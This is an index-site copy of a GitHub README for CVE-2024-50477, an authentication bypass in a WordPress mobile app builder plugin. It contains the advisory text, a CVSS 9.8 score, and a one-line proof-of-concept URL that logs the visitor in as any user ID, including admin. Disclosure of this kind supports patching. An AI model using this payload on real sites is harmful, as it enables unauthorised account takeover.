Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/randomrobbiebf/cve-2024-50477

Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover
https://github.com/randomrobbiebf/cve-2024-50477

Last synced: about 1 month ago
JSON representation

Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover

Awesome Lists containing this project

README

        

# CVE-2024-50477
Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover

# Description:
The Stacks Mobile App Builder – The most powerful Mobile Applications Drag and Drop builder plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.2.3. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the receive_request_checkout() function. This makes it possible for unauthenticated attackers to log in as any user based on user ID.

```
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50477
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: stacks-mobile-app-builder
```

POC
---

```
http://kubernetes.docker.internal/?mobile_co=1&uid=1
```

You should be redirected and logged in as admin. ID is the user you wish to login as.